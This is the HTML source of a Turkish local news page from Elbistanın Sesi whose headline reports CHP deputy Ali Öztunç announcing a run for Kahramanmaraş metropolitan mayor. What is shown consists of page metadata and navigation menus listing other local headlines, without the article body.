  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Öztunç: “Büyükşehir Belediyesi’ne adayım”</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Cumhuriyet Halk Partisi (CHP) Genel Başkan Yardımcısı Kahramanmaraş Milletvekili Ali Öztunç, önümüzdeki dönem için Büyükşehir Belediye Başkanlığı&#039;na aday olduğunu açıkladı." />
<meta name="keywords" content="Öztunç: Büyükşehir Belediyesine adayım" />
<meta name="news_keywords" content="Öztunç: Büyükşehir Belediyesine adayım">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Öztunç: “Büyükşehir Belediyesi’ne adayım”" />
<meta property="og:description" content="Cumhuriyet Halk Partisi (CHP) Genel Başkan Yardımcısı Kahramanmaraş Milletvekili Ali Öztunç, önümüzdeki dönem için Büyükşehir Belediye Başkanlığı&#039;na aday olduğunu açıkladı." />
  <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Öztunç: “Büyükşehir Belediyesi’ne adayım”" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html" />
<meta name="twitter:domain" content="http://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Öztunç: “Büyükşehir Belediyesi’ne adayım”" />
<meta name="twitter:description" content="Cumhuriyet Halk Partisi (CHP) Genel Başkan Yardımcısı Kahramanmaraş Milletvekili Ali Öztunç, önümüzdeki dönem için Büyükşehir Belediye Başkanlığı’na aday olduğunu açıkladı." />
<meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" /><link rel="alternate" href="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html">
<link rel="amphtml" href="http://www.elbistaninsesi.com/amp/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html">
  <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Öztunç: “Büyükşehir Belediyesi’ne adayım”" />
<meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-09-04T11:44:38+02:00" />
<meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Öztunç: Büyükşehir Belediyesine adayım" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.3054</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">9.9333</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">488.22</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1468.67</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html" title="Öztunç: “Büyükşehir Belediyesi’ne adayım”" >Öztunç: “Büyükşehir Belediyesi’ne adayım”</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/borc-yapilandirma-basvuru-ve-odeme-sureleri-uzatildi-h71103.html" title="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı" >Borç yapılandırma başvuru ve ödeme süreleri uzatıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kaski-su-fiyatlarina-zam-yapti-h71100.html" title="KASKİ, su fiyatlarına zam yaptı" >KASKİ, su fiyatlarına zam yaptı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/mikrokredi-ile-7-yilda-hayati-degisti-h71099.html" title="Mikrokredi ile 7 yılda hayatı değişti" >Mikrokredi ile 7 yılda hayatı değişti</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kentparktan-okula-donus-kampanyasi-h71098.html" title="Kentpark’tan okula dönüş kampanyası" >Kentpark’tan okula dönüş kampanyası</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-yksde-dereceye-giren-ogrencileri-misafir-etti-h71097.html" title="Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti" >Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/igdeliler-derneklerinin-yoneticileri-istisare-toplantisinda-bulustu-h71096.html" title="İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu" >İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/evcihuyukten-suriye-ye-yardim-eli-h71095.html" title="Evcihüyük’ten Suriye&#039;ye yardım eli" >Evcihüyük’ten Suriye&#039;ye yardım eli</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/camura-batan-inek-itfaiye-tarafindan-kurtarildi-2-h71094.html" title="Çamura batan inek, itfaiye tarafından kurtarıldı" >Çamura batan inek, itfaiye tarafından kurtarıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/ceyhana-18-bin-adet-yavru-sazan-baligi-birakildi-h71093.html" title="Ceyhan’a 18 bin adet yavru sazan balığı bırakıldı" >Ceyhan’a 18 bin adet yavru sazan balığı bırakıldı</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="9599dfbc0fa06a7a878aa1c37d8fedf277abdfd6" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Öztunç: “Büyükşehir Belediyesi’ne adayım”" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="http://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/abdullah-ceran-82-yasinda-h71105.html" title="Abdullah Ceran 82 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/abdullah_ceran_82_yasinda_h71105_a4d41.jpg" alt="Abdullah Ceran 82 yaşında" />
Abdullah Ceran 82 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/meryem-bozkurt-67-yasinda-h71104.html" title="Meryem Bozkurt 67 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/meryem_bozkurt_67_yasinda_h71104_262dc.jpg" alt="Meryem Bozkurt 67 yaşında" />
Meryem Bozkurt 67 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-bedri-citak-h71102.html" title="Vefat-Teşekkür / Bedri Çıtak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/vefat_tesekkur_bedri_citak_h71102_7fd81.jpg" alt="Vefat-Teşekkür / Bedri Çıtak" />
Vefat-Teşekkür / Bedri Çıtak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/bahtiyar-tas-42-yasinda-h71101.html" title="Bahtiyar Taş 42 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/bahtiyar_tas_42_yasinda_h71101_4a4f5.jpg" alt="Bahtiyar Taş 42 yaşında" />
Bahtiyar Taş 42 yaşında</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html" title="Öztunç: “Büyükşehir Belediyesi’ne adayım”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" alt="Öztunç: “Büyükşehir Belediyesi’ne adayım”" />
Öztunç: “Büyükşehir Belediyesi’ne adayım”</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/borc-yapilandirma-basvuru-ve-odeme-sureleri-uzatildi-h71103.html" title="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/borc_yapilandirma_basvuru_ve_odeme_sureleri_uzatildi_h71103_7e922.jpg" alt="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı" />
Borç yapılandırma başvuru ve ödeme süreleri uzatıldı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kaski-su-fiyatlarina-zam-yapti-h71100.html" title="KASKİ, su fiyatlarına zam yaptı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/kaski_su_fiyatlarina_zam_yapti_h71100_548f0.jpg" alt="KASKİ, su fiyatlarına zam yaptı" />
KASKİ, su fiyatlarına zam yaptı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/mikrokredi-ile-7-yilda-hayati-degisti-h71099.html" title="Mikrokredi ile 7 yılda hayatı değişti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/mikrokredi_ile_7_yilda_hayati_degisti_h71099_ceb9e.jpg" alt="Mikrokredi ile 7 yılda hayatı değişti" />
Mikrokredi ile 7 yılda hayatı değişti</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
